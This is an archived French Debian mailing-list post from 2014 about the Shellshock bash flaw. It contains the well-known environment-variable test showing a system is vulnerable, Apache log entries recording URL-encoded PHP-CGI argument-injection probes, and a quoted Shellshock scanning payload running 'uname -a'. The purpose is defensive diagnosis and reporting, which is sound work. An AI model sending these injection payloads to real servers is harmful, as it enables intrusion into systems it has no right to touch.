Zut !
~# env X="() { :;} ; echo busted" /bin/sh -c "echo completed"
busted
completed
~# env X="() { :;} ; echo busted" `which bash` -c "echo completed"
busted
completed
Par contre dans mes logs, je n'ai que des trucs comme ça :
142.4.195.183 - - [26/Sep/2014:00:59:39 +0200] "POST /cgi-bin/php/%63%
67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%73%
75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%65+
%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F
%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+%2D%
6E HTTP/1.1" 403 168 "-" "-"
46.165.221.166 - - [26/Sep/2014:00:59:40 +0200] "POST /cgi-bin/php/%
63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%
73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%
65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%
65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+
%2D%6E HTTP/1.1" 403 168 "-" "-"
Le 26 sept. 14 à 22:52, admini a écrit :
pendant ce temps ca scanne sévère:
() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a
je vois ça sur mon site de production.
--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists
Pour vous DESABONNER, envoyez un message avec comme objet
"unsubscribe"
vers debian-user-french-requ...@lists.debian.org
En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org
Archive: https://lists.debian.org/5425d216.1050...@freeatome.com
--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists
Pour vous DESABONNER, envoyez un message avec comme objet "unsubscribe"
vers debian-user-french-requ...@lists.debian.org
En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org
Archive:
https://lists.debian.org/943686b7-8d7e-4ec9-a856-edb517ee0...@worldonline.fr